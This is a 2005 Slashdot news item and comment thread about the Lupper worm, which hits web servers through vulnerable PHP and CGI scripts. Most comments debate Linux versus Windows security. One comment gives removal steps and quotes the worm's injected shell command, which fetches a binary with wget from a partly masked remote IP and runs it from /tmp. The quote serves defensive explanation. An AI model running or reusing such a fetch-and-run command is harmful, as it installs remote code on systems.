jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."Ads_xl=0;Ads_yl=0;Ads_xp='';Ads_yp='';Ads_xp1='';Ads_yp1='';Ads_par='';Ads_cnturl='';Ads_prf='page=article';Ads_channels='RON_P6_IMU';Ads_wrd='worms,linux';Ads_kid=0;Ads_bid=0;Ads_sec=0; Linux Lupper.Worm In the WIld Log in/Create an Account | Top | 335 comments (Spill at 50!) | Index Only | Search Discussion Display Options Threshold: -1: 335 comments 0: 330 comments 1: 257 comments 2: 176 comments 3: 68 comments 4: 39 comments 5: 26 comments Flat Nested No Comments Threaded Oldest First Newest First Highest Scores First Oldest First (Ignore Threads) Newest First (Ignore Threads) The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way. CONTINUE: (Score:5, Funny) by xtracto (837672) on Tuesday November 08, @09:51AM (#13978478) (Last Journal: Wednesday November 02, @07:21AM) Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.p.s. BURN KARMA BURN! [ Reply to ThisRe:CONTINUE: by EraserMouseMan (Score:2) Tuesday November 08, @09:57AMRe:CONTINUE: by LittLe3Lue (Score:1) Tuesday November 08, @11:26AMRe:CONTINUE: by rtb61 (Score:2) Tuesday November 08, @10:32PMRe:CONTINUE: by EraserMouseMan (Score:2) Tuesday November 08, @11:30PMRe:CONTINUE: by freeweed (Score:3) Tuesday November 08, @10:14AMRe:CONTINUE: by clickster (Score:3) Tuesday November 08, @10:40AM Only partially. (Score:4, Insightful) by khasim (1285) <brandioch.conner@gmail.com> on Tuesday November 08, @11:16AM (#13979197) Let's look at this logically.If the Linux distribution does not run Apache by default, it is safe.If Windows does not run IIS by default, it is safe.So far, so good.If the Linux distribution does not run PHP by default, it is safe.If Windows does not run their scripting system by default, it is safe.So far, so good.If the Linux distribution does not run those particular scripts by default, it is safe.If Windows does not run vulnerable scripts by default, it is safe.So far, so good.So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.Both can be made vulnerable by installing systems/scripts that are not part of the default system.But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems. [ Reply to This | ParentRe:Only partially. by penguinrenegade (Score:1) Tuesday November 08, @12:30PMRe:Only partially. by Blapto (Score:3) Tuesday November 08, @05:55PM1 reply beneath your current threshold.Can't measure OS security by worm prevalence. by Bob.Kerns (Score:3) Tuesday November 08, @03:13PM1 reply beneath your current threshold.Re:CONTINUE: by freeweed (Score:2) Tuesday November 08, @12:28PMApples to Oranges by clickster (Score:2) Tuesday November 08, @12:38PMHere's a cluestick for you by freeweed (Score:1) Tuesday November 08, @02:19PMRe:Here's a cluestick for you by clickster (Score:2) Tuesday November 08, @02:36PMRe:CONTINUE: by budgenator (Score:3) Tuesday November 08, @12:59PMRe:CONTINUE: by digismack (Score:1) Tuesday November 08, @02:13PMRe:CONTINUE: by clickster (Score:2) Tuesday November 08, @10:51AMRe:CONTINUE: by Enahs (Score:2) Tuesday November 08, @11:09AMRe:CONTINUE: by trick-knee (Score:2) Tuesday November 08, @10:43PM1 reply beneath your current threshold.Re:CONTINUE: by idonthack (Score:1) Tuesday November 08, @12:07PM2 replies beneath your current threshold.Re:CONTINUE: by ksjfhdsalf (Score:1) Tuesday November 08, @10:16AMRe:CONTINUE: by Omniscientist (Score:3) Tuesday November 08, @12:48PMRe:CONTINUE: by Trepalium (Score:1) Tuesday November 08, @01:15PMsysadmins: known holes will be the next worms ! by free2 (Score:1) Tuesday November 08, @01:49PMRe:CONTINUE: by tinkertim (Score:1) Tuesday November 08, @11:03PM Remarkably Useless page. (Score:5, Interesting) by Short Circuit (52384) * <mikemol@@@gmail...com> on Tuesday November 08, @09:52AM (#13978479) (http://citygen.org/ | Last Journal: Monday October 31, @08:58AM) First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.Second, how do you remove it? Quoth the page: Removal InstructionsAVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.Additional Windows ME/XP removal considerations [ Reply to This Re:Remarkably Useless page. (Score:4, Informative) by TheSpoom (715771) * on Tuesday November 08, @09:54AM (#13978500) (http://www.uberm00.net/ | Last Journal: Monday January 19, @09:27PM) It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability. [ Reply to This | Parent Re:Remarkably Useless page. (Score:5, Insightful) by tomhudson (43916) <(thudson) (at) (gmail.com)> on Tuesday November 08, @09:59AM (#13978552) (http://groupehudson.com/ | Last Journal: Tuesday November 08, @08:51PM) More alarmist shit (and old news at tht - The Reg reported this last week).Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus. [ Reply to This | Parent Re:Remarkably Useless page. (Score:4, Informative) by harlows_monkeys (106428) on Tuesday November 08, @10:53AM (#13979012) (http://www.tzs.net/) More alarmist shit (and old news at tht - The Reg reported this last week)My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.This indicates that this is indeed in the wild, and active, and spreading.Thus, it is not alarmist shit. [ Reply to This | Parent Re:Remarkably Useless page. (Score:4, Insightful) by tomhudson (43916) <(thudson) (at) (gmail.com)> on Tuesday November 08, @11:06AM (#13979115) (http://groupehudson.com/ | Last Journal: Tuesday November 08, @08:51PM) The key word is "attempts".Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.Now:If you haven't updated your machine in yearsIf you have those particular scripts installedIf you allow files in /tmp to be run by processes from user "nobody" ... that's a LOT of ifs ...In other words, nothing to see here but more antivirus vendor fud. [ Reply to This | ParentRe:Remarkably Useless page. by eventhorizon5 (Score:2) Tuesday November 08, @04:23PMRe:Remarkably Useless page. by tomhudson (Score:2) Tuesday November 08, @01:13PMRe:Remarkably Useless page. by tomhudson (Score:3) Tuesday November 08, @01:22PMRe:Because it eats my bandwidth $ by Taevin (Score:2) Tuesday November 08, @07:51PM3 replies beneath your current threshold. Re:Remarkably Useless page. (Score:5, Funny) by tomhudson (43916) <(thudson) (at) (gmail.com)> on Tuesday November 08, @11:10AM (#13979161) (http://groupehudson.com/ | Last Journal: Tuesday November 08, @08:51PM) I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/ [127.0.0.1]Knock yourselves out :-) [ Reply to This | Parent Re:Remarkably Useless page. (Score:5, Funny) by Macrobat (318224) on Tuesday November 08, @02:08PM (#13980930) You know, if you link to a porn site, you could at least warn us. [ Reply to This | ParentRe:Remarkably Useless page. by tomhudson (Score:2) Tuesday November 08, @01:25PM2 replies beneath your current threshold.Re:Remarkably Useless page. by j-cloth (Score:1) Tuesday November 08, @11:12AMRe:Remarkably Useless page. by CowboyBob500 (Score:2) Tuesday November 08, @11:19AMRe:Remarkably Useless page. by Kiaser Zohsay (Score:2) Tuesday November 08, @12:19PMPost 10 of those IP addresses. by khasim (Score:2) Tuesday November 08, @11:59AMRe:Post 10 of those IP addresses. by harlows_monkeys (Score:2) Tuesday November 08, @12:46PMnmap results by khasim (Score:2) Tuesday November 08, @01:04PMRe:Post 10 of those IP addresses. by jack_csk (Score:1) Tuesday November 08, @04:52PM1 reply beneath your current threshold.Re:Remarkably Useless page. by Stephen Samuel (Score:3) Tuesday November 08, @01:49PMRe:Remarkably Useless page. by dp101270 (Score:1) Tuesday November 08, @11:55AMRe:Remarkably Useless page. by tomhudson (Score:2) Tuesday November 08, @01:05PMRe:Remarkably Useless page. by tomhudson (Score:2) Tuesday November 08, @10:24AM1 reply beneath your current threshold. Re:Remarkably Useless page. (Score:5, Informative) by gowen (141411) <slashdot@gwowen.freeserve.co.uk> on Tuesday November 08, @09:55AM (#13978513) (Last Journal: Thursday October 31, @02:07PM) According to ZDNet/Symantec [zdnet.com] "The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services." [ Reply to This | ParentRe:Remarkably Useless page. by Viper Daimao (Score:1) Tuesday November 08, @10:46AM Other links (Score:4, Informative) by AndroidCat (229562) on Tuesday November 08, @10:04AM (#13978599) (http://home.primus.ca/~ronsharp/) Security Focus [securityfocus.com] eWeek [eweek.com] CNet [com.com] [ Reply to This | Parent It's not Windows (Score:5, Informative) by max born (739948) on Tuesday November 08, @10:19AM (#13978735) From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp. [ Reply to This | ParentRe:It's not Windows by tomhudson (Score:2) Tuesday November 08, @10:42AMRe:It's not Windows by archen (Score:1) Tuesday November 08, @11:47AM1 reply beneath your current threshold.Re:It's not Windows by 51mon (Score:1) Tuesday November 08, @01:03PMRe:It's not Windows by phiwum (Score:1) Tuesday November 08, @01:48PMRe:It's not Windows by budgenator (Score:2) Tuesday November 08, @03:52PM2 replies beneath your current threshold. Re:Remarkably Useless page. (Score:5, Insightful) by budgenator (254554) on Tuesday November 08, @03:39PM (#13981936) (Last Journal: Tuesday November 02, @10:49AM) step one go to securityfocus [securityfocus.com] and update all of the applications listed on your system.SymptomsPresence of the following file:* /tmp/lupiiOne of the following ports are listening:        * UDP 7111        * UDP 7222so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222then it would be easy tosu -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch tmp/lupii"the worm appearent does thisecho '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories. [ Reply to This | Parent PHP exploit, not directly a linux problem? (Score:5, Insightful) by Anonymous Coward on Tuesday November 08, @09:52AM (#13978480) Seems kind of wrong to name it exclusively a linux problem. [ Reply to ThisRe:PHP exploit, not directly a linux problem? by xyvimur (Score:1) Tuesday November 08, @09:55AM Re:PHP exploit, not directly a linux problem? (Score:5, Informative) by mysqlrocks (783488) on Tuesday November 08, @09:58AM (#13978542) (http://www.gtalkprofile.com/profile/2.html | Last Journal: Thursday September 15, @08:54AM) Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell). [ Reply to This | Parent Re:PHP exploit, not directly a linux problem? (Score:4, Informative) by rbochan (827946) on Tuesday November 08, @10:17AM (#13978713) (http://www.cnycomputerservice.com/) Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).According to this article [com.com], AWStats was patched back in February. [ Reply to This | Parent AWStats is a PHP application? (Score:5, Informative) by smartfart (215944) * <joey@joeykel[ ]net ['ly.' in gap]> on Tuesday November 08, @11:17AM (#13979207) (http://joeykelly.net/ | Last Journal: Friday September 02, @01:42PM) Um, AWStats isn't written in PHP, but in Perl [freshmeat.net]. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app. [ Reply to This | ParentRe:AWStats is a PHP application? by mysqlrocks (Score:2) Tuesday November 08, @12:18PMRe:PHP exploit, not directly a linux problem? by Kelson (Score:2) Tuesday November 08, @12:29PM1 reply beneath your current threshold.Re:PHP exploit, not directly a linux problem? by EraserMouseMan (Score:3) Tuesday November 08, @10:00AMRe:PHP exploit, not directly a linux problem? by budgenator (Score:2) Tuesday November 08, @04:09PMRe:PHP exploit, not directly a linux problem? by sqlrob (Score:3) Tuesday November 08, @10:11AMRe:PHP exploit, not directly a linux problem? by Been on TV (Score:2) Tuesday November 08, @11:11AM1 reply beneath your current threshold.Re:PHP exploit, not directly a linux problem? by Been on TV (Score:2) Tuesday November 08, @11:23AMLooks like it's a Linux binary though by Sycraft-fu (Score:2) Tuesday November 08, @11:38AM1 reply beneath your current threshold.How can we get some free press? by ivan256 (Score:3) Tuesday November 08, @09:52AM Re:How can we get some free press? (Score:5, Insightful) by jellomizer (103300) * on Tuesday November 08, @09:57AM (#13978529) (http://localhost:8080/) Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms. [ Reply to This | Parent Re:How can we get some free press? (Score:5, Insightful) by sqlrob (173498) on Tuesday November 08, @10:01AM (#13978576) IE Worm = Windows worm.Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm. [ Reply to This | Parentwell, no by diegocgteleline.es (Score:2) Tuesday November 08, @10:37AMRe:How can we get some free press? by chamblah (Score:2) Tuesday November 08, @10:39AMRe:How can we get some free press? by NatasRevol (Score:2) Tuesday November 08, @10:59AMIE 5? by noisymime (Score:1) Tuesday November 08, @01:01PMIE is not cross-platform by macdaddy (Score:3) Tuesday November 08, @04:32PMRe:How can we get some free press? by haruchai (Score:1) Tuesday November 08, @10:36AM3 replies beneath your current threshold.Re:How can we get some free press? by slavemowgli (Score:2) Tuesday November 08, @10:11AMRe:How can we get some free press? by SmellTheCoffee (Score:2) Tuesday November 08, @10:19AMRe:How can we get some free press? by Halfbaked Plan (Score:2) Tuesday November 08, @06:37PMRe:How can we get some free press? by cnelzie (Score:2) Tuesday November 08, @10:25AM1 reply beneath your current threshold.This is the greatest worm ever! by gosand (Score:2) Tuesday November 08, @11:02AMRe:This is the greatest worm ever! by carlos_benj (Score:1) Tuesday November 08, @03:16PMRe:How can we get some free press? by lunadog (Score:1) Tuesday November 08, @11:15AMRe:How can we get some free press? by cout (Score:2) Tuesday November 08, @12:50PMRe:How can we get some free press? by carlos_benj (Score:1) Tuesday November 08, @03:12PM2 replies beneath your current threshold.Re:How can we get some free press? by Overly Critical Guy (Score:2) Tuesday November 08, @12:54PM if it attacks PHP cross-platform... (Score:5, Insightful) by frankie (91710) on Tuesday November 08, @09:53AM (#13978489) (http://geocities.com/francis_uy/ | Last Journal: Monday November 07, @04:47PM) ...then it's a PHP/*nix worm, not Linux specifically.Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable. [ Reply to This Re:if it attacks PHP cross-platform... (Score:4, Informative) by alexhs (877055) on Tuesday November 08, @10:28AM (#13978793) (http://dr-tools.sourceforge.net/) ...then it's a PHP/*nix worm, not Linux specifically.Not exactly. From what I understood, there are BSD and Linux variants : both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.There's a layer available in BSD that allows to run Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through wine.Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ? [ Reply to This | ParentRe:if it attacks PHP cross-platform... by Anonymous Coward (Score:1) Tuesday November 08, @10:37AM1 reply beneath your current threshold.Re:if it attacks PHP cross-platform... by Halfbaked Plan (Score:1) Tuesday November 08, @06:42PM1 reply beneath your current threshold. Sadly a preview of things to come because... (Score:5, Insightful) by Assmasher (456699) on Tuesday November 08, @09:54AM (#13978498) (Last Journal: Saturday April 03, @07:10PM) ...Linux is more and more popular with corporations holding valuable and important data.Success is a double-edged sword. ;) [ Reply to ThisRe:Sadly a preview of things to come because... by _Sprocket_ (Score:2) Tuesday November 08, @11:09AMRe:Sadly a preview of things to come because... by Assmasher (Score:2) Tuesday November 08, @11:27AMRe:Sadly a preview of things to come because... by _Sprocket_ (Score:2) Tuesday November 08, @12:13PMRe:Sadly a preview of things to come because... by Assmasher (Score:2) Tuesday November 08, @01:25PMRe:Sadly a preview of things to come because... by Questy (Score:1) Tuesday November 08, @11:23AMRe:Sadly a preview of things to come because... by budgenator (Score:3) Tuesday November 08, @04:47PMPopularity != Security by khasim (Score:3) Tuesday November 08, @11:25AMRe:Popularity != Security by Assmasher (Score:2) Tuesday November 08, @11:32AM You're wrong. (Score:5, Insightful) by khasim (1285) <brandioch.conner@gmail.com> on Tuesday November 08, @11:56AM (#13979669) It will come up because it is true. No. It will keep coming up because people who don't understand security will keep bringing it up.There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home. As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises. That's what you believe. Yet my bank example shows that popularity has nothing to do with security. Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate. That is because your statement is as inaccurate as possible already.By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.And security is why this worm will not do much damage.http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html [symantec.com]Look for "Number of Infections: 0-49".Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!What's that? "Number of Sites: 0-2"?That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat. [ Reply to This | ParentRe:You're wrong. by Assmasher (Score:2) Tuesday November 08, @01:21PMMake all the claims you want. by khasim (Score:2) Tuesday November 08, @01:49PMRe:Make all the claims you want. by Assmasher (Score:2) Tuesday November 08, @02:09PMRe:Make all the claims you want. by falconx7 (Score:1) Tuesday November 08, @03:52PMKicked your ass. by khasim (Score:2) Tuesday November 08, @02:17PMRe:Kicked your ass. by Assmasher (Score:2) Tuesday November 08, @02:24PM1 reply beneath your current threshold.Re:You're wrong. by d34thm0nk3y (Score:2) Tuesday November 08, @02:57PMNo. by khasim (Score:3) Tuesday November 08, @03:11PM1 reply beneath your current threshold. Complete infection (Score:5, Funny) by soren.harward (1153) on Tuesday November 08, @09:54AM (#13978505) All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you. [ Reply to ThisRe:Complete infection by djsmiley (Score:1) Tuesday November 08, @11:01AM2 replies beneath your current threshold.Re:Complete infection by theendlessnow (Score:1) Tuesday November 08, @01:43PMRe:Complete infection by biduxe (Score:1) Tuesday November 08, @05:40PMRe:Complete infection by SlashSquatch (Score:1) Tuesday November 08, @10:21AMRe:Complete infection by bloodstains (Score:1) Tuesday November 08, @11:32AMRe:Complete infection by Jesus_666 (Score:1) Tuesday November 08, @11:58AM1 reply beneath your current threshold.Been around earlier? by Anonymous Coward (Score:1) Tuesday November 08, @09:55AMRe:Been around earlier? by jurt1235 (Score:2) Tuesday November 08, @10:23AMRe:Been around earlier? by hawkeyeMI (Score:2) Tuesday November 08, @01:21PMRe:Been around earlier? by Darth Daver (Score:2) Tuesday November 08, @10:40AMRe:Been around earlier? by smc13 (Score:1) Tuesday November 08, @01:39PM Conditions for infection... (Score:5, Insightful) by xutopia (469129) on Tuesday November 08, @09:56AM (#13978520) (http://www.xutopia.com/) "If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."I'm thinking this is funny as hell. How many people configure apache this way? [ Reply to This